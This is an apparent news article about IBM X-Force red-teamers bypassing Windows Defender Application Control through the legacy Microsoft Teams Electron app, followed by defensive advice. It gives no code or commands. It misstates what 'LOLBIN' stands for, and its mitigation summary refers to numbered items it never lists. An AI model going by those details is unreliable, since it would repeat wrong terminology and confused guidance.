Hackers Bypass Windows Defender Security — What You Need To Know
Recently, elite red team hackers from IBM X-Force have confirmed that they can bypass the security controls of Windows Defender Application Control (WDAC), a software-based security layer designed to protect devices against malware and untrusted software. This is a significant development in the world of cybersecurity, with far-reaching implications for users.
In order to understand the severity of this issue, it's essential to briefly explain what WDAC does. In its own words, Microsoft describes it as "a security boundary that prevents malicious code from running by ensuring that only approved code can be run." This means that only trusted software is allowed to execute on a device, and any attempts to bypass this control are considered a major security risk.
The good news is that the researchers behind the bypass have been transparent about their findings. Bobby Cooke, an IBM X-Force red team operator, confirmed that Microsoft Teams was "a viable WDAC bypass" target. By exploiting a vulnerability in Electron applications, Cooke and his team successfully bypassed the security controls and executed their payload.
So, how did they do it? The researchers targeted the legacy Microsoft Teams application, which is built on Electron and signed by Microsoft. This made it an attractive target for the red team, as it was capable of bypassing even the strictest WDAC policies. However, there's a catch – Node.js, the JavaScript engine used in Electron applications, lacks the full functionality of C, where developers can directly call WINAPIs and NTAPIs.
But that gap is bridged by Node modules, which can extend the capabilities of the Node.js framework and execute JavaScript within Electron applications. This allowed Cooke's team to manipulate the tool and use it to bypass WDAC controls.
The LOLBIN (Long-Running Local Binaries) attack is a type of attack that uses perfectly legitimate tools built into the operating system, which can be exploited without setting off security alarms. The attackers manipulate these tools to achieve their goals, often with devastating results – payload obfuscation, code compiling and execution, DLL hijacking, and security protection evasion are all possible outcomes.
So, what can you do to protect yourself? CrowdStrike expert Naeem Rizwan Mirza advises a multi-layered approach, combining proactive measures, detection capabilities, and incident response strategies. Endpoint detection and response can help provide visibility into command line execution and network connections, allowing for the detection of unusual uses of LOLBINS.
Mirza also emphasizes the importance of good security hygiene, including patch management to fix vulnerabilities in a timely manner, threat intelligence to understand what you're defending against, and an incident response plan to outline steps for detection, containment, eradication, and recovery.
The full report on this attack is highly technical and recommended for security defenders. However, the TL;DR is that mitigating number one requires implementing recommended block list rules or using another solution to detect common LOLBINS, and mitigating number two is only effective if WDAC Application Control is enabled without enforcing DLL signing.
Microsoft has acknowledged this report and stated that they will take action as needed to help keep customers protected. However, the impact of this vulnerability on users will depend on their individual circumstances, and it's essential to stay vigilant and take proactive steps to protect yourself against future attacks.